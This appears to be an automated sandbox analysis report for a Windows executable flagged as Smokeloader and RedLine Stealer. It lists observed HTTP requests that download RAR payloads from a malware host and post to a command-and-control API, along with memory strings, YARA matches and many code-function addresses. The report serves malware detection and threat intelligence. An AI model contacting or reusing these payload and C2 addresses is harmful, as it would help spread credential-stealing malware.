Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: ddos.dnsnb8.net
Source: global traffic	DNS traffic detected: DNS query: sofahuntingslidedine.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sofahuntingslidedine.shop

Source: jJEAWO.exe, 00000001.00000003.1675913190.0000000000E80000.00000004.00001000.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000002.1862470986.0000000000E93000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: jJEAWO.exe, 00000001.00000003.1683352875.000000000107B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: jJEAWO.exe, 00000001.00000003.1683352875.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000003.1683579567.00000000010B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarE0
Source: jJEAWO.exe, 00000001.00000003.1683506510.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000003.1683352875.00000000010B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarT
Source: jJEAWO.exe, 00000001.00000003.1683352875.00000000010EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarcC:
Source: jJEAWO.exe, 00000001.00000002.1862651851.000000000105E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: jJEAWO.exe, 00000001.00000002.1862651851.000000000109F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManagerA
Source: jJEAWO.exe, 00000001.00000002.1862651851.00000000010B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarN
Source: jJEAWO.exe, 00000001.00000002.1862651851.00000000010B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarh?
Source: jJEAWO.exe, 00000001.00000002.1862651851.000000000105E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rark
Source: jJEAWO.exe, 00000001.00000002.1862651851.00000000010B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarl
Source: jJEAWO.exe, 00000001.00000002.1862651851.000000000105E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarm
Source: jJEAWO.exe, 00000001.00000002.1863177242.0000000002DBA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarp
Source: Amcache.hve.1.dr	String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.develop.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.lua.org
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.spaceblue.comMathias
Source: jJEAWO.exe, 00000001.00000003.1683506510.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000002.1862651851.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000003.1683352875.00000000010B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com2
Source: current[1].exe, 00000000.00000002.2053363980.00000000008DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sofahuntingslidedine.shop/
Source: current[1].exe, 00000000.00000003.2020633565.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000002.2053204670.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.2020575396.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.1707640338.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000002.2052970229.000000000081E000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.2020471181.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000002.2053363980.00000000008DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sofahuntingslidedine.shop/api
Source: current[1].exe, 00000000.00000003.2020633565.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.2020575396.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000002.2053363980.00000000008DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sofahuntingslidedine.shop/apik
Source: current[1].exe, 00000000.00000003.2020471181.000000000089A000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.1707811358.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000002.2053204670.000000000089A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sofahuntingslidedine.shop/u
Source: current[1].exe, 00000000.00000003.1707640338.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.1707811358.0000000000894000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.1707606358.0000000002BA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: current[1].exe, 00000000.00000003.1707640338.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.1707606358.0000000002BA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/ddos/glossary/malware/
Source: SciTE.exe.1.dr	String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.1.dr	String found in binary or memory: https://www.smartsharesystems.com/Morten

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2

Source: SciTE.exe.1.dr

Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

memstr_c9d56119-2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2053042174.000000000082E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

PE file contains section with special chars

Source: current[1].exe	Static PE information: section name: ESu,
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR

PE file has a writeable .text section

Source: jJEAWO.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00462440 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_00462440
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0042E700 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_0042E700
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00460870 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_00460870
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045E927 NtOpenSection,	0_2_0045E927
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00462990 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_00462990
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045EAE9 NtMapViewOfSection,	0_2_0045EAE9
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00460A90 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_00460A90
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045EFF5 NtClose,	0_2_0045EFF5
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00451140 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_00451140
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045A160 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_0045A160
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0044E120 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_0044E120
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045D1D0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_0045D1D0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004641E0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_004641E0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00439260 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_00439260
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004632A0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_004632A0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00451370 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_00451370
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045D400 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_0045D400
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004394C0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_004394C0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004634F0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_004634F0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004434B0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_004434B0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045C550 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_0045C550
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00437530 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_00437530
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004645E0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_004645E0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004396E0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_004396E0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004626F0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_004626F0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045C790 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_0045C790
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00464800 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_00464800
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004638F0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_004638F0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00439910 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_00439910
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0042E920 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_0042E920
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045CA90 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_0045CA90
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00463B20 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_00463B20
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00462BF0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_00462BF0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045CD20 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_0045CD20
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00462F00 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_00462F00
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045CF80 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_0045CF80
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00463FA0 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_00463FA0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A3167 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_007A3167
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079D1E7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_0079D1E7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A4207 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_007A4207
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079A3C7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_0079A3C7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007913A7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_007913A7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0078E387 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_0078E387
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A4447 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_007A4447
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079D437 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_0079D437
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007794C7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_007794C7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A3507 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_007A3507
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007915D7 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_007915D7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079D667 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_0079D667
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A26A7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_007A26A7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A3757 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_007A3757
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00779727 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_00779727
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00783717 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_00783717
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079C7B7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_0079C7B7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00777797 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_00777797
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A4847 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_007A4847
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0076E967 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_0076E967
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A2957 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_007A2957
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00779947 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_00779947
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079C9F7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_0079C9F7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A4A67 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_007A4A67
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A0AD7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_007A0AD7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00779B77 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_00779B77
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A3B57 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_007A3B57
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A2BF7 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_007A2BF7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0076EB87 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_0076EB87
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A0CF7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_007A0CF7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079CCF7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_0079CCF7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A3D87 NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_007A3D87
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A2E57 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_007A2E57
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079CF87 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,	0_2_0079CF87

Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00462440	0_2_00462440
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0042E700	0_2_0042E700
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00460870	0_2_00460870
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004238A0	0_2_004238A0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045E927	0_2_0045E927
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00462990	0_2_00462990
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00424A2F	0_2_00424A2F
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045EAE9	0_2_0045EAE9
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00460A90	0_2_00460A90
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00422DE0	0_2_00422DE0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00425FCA	0_2_00425FCA
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00437048	0_2_00437048
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0041E070	0_2_0041E070
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00403000	0_2_00403000
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00414010	0_2_00414010
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045E0C8	0_2_0045E0C8
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0043D0F0	0_2_0043D0F0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00451140	0_2_00451140
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00411150	0_2_00411150
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045A160	0_2_0045A160
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0042716F	0_2_0042716F
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0043911F	0_2_0043911F
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0044E120	0_2_0044E120
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0044713B	0_2_0044713B
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045D1D0	0_2_0045D1D0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004641E0	0_2_004641E0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00439260	0_2_00439260
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0044A22D	0_2_0044A22D
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00459230	0_2_00459230
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00448B92	0_2_00448B92
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0044B290	0_2_0044B290
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004632A0	0_2_004632A0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0044E340	0_2_0044E340
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045F352	0_2_0045F352
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00451370	0_2_00451370
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0042B318	0_2_0042B318
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00427325	0_2_00427325
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004143C0	0_2_004143C0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0041F3A0	0_2_0041F3A0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045F456	0_2_0045F456
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00432456	0_2_00432456
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004394C0	0_2_004394C0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004634F0	0_2_004634F0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004434B0	0_2_004434B0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045C550	0_2_0045C550
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00437530	0_2_00437530
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004645E0	0_2_004645E0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0044459F	0_2_0044459F
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004515A0	0_2_004515A0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045A5B2	0_2_0045A5B2
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00412670	0_2_00412670
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00448614	0_2_00448614
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004396E0	0_2_004396E0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00428680	0_2_00428680
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00443700	0_2_00443700
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0043172D	0_2_0043172D
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0041E7C0	0_2_0041E7C0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004247D2	0_2_004247D2
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004277E0	0_2_004277E0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045C790	0_2_0045C790
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00414860	0_2_00414860
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00461875	0_2_00461875
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0042A87A	0_2_0042A87A
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00430802	0_2_00430802
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004638F0	0_2_004638F0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004268B3	0_2_004268B3
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00439910	0_2_00439910
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00413920	0_2_00413920
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0042E920	0_2_0042E920
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00432930	0_2_00432930
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0042BA2F	0_2_0042BA2F
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045CA90	0_2_0045CA90
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0042CA9C	0_2_0042CA9C
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0043AB07	0_2_0043AB07
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00463B20	0_2_00463B20
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00412BD0	0_2_00412BD0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00462BF0	0_2_00462BF0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00437C01	0_2_00437C01
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00425C07	0_2_00425C07
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00445C17	0_2_00445C17
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0042AC22	0_2_0042AC22
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0044ACC4	0_2_0044ACC4
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0042CCB5	0_2_0042CCB5
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00447D50	0_2_00447D50
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00429D65	0_2_00429D65
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045DD68	0_2_0045DD68
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00411D70	0_2_00411D70
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045CD20	0_2_0045CD20
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0041CD30	0_2_0041CD30
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0041FD80	0_2_0041FD80
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00445E1C	0_2_00445E1C
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0042DEC0	0_2_0042DEC0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00431EF5	0_2_00431EF5
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00459E90	0_2_00459E90
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045DF5C	0_2_0045DF5C
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00462F00	0_2_00462F00
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0043CF20	0_2_0043CF20
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00448FEB	0_2_00448FEB
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00448FF0	0_2_00448FF0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045CF80	0_2_0045CF80
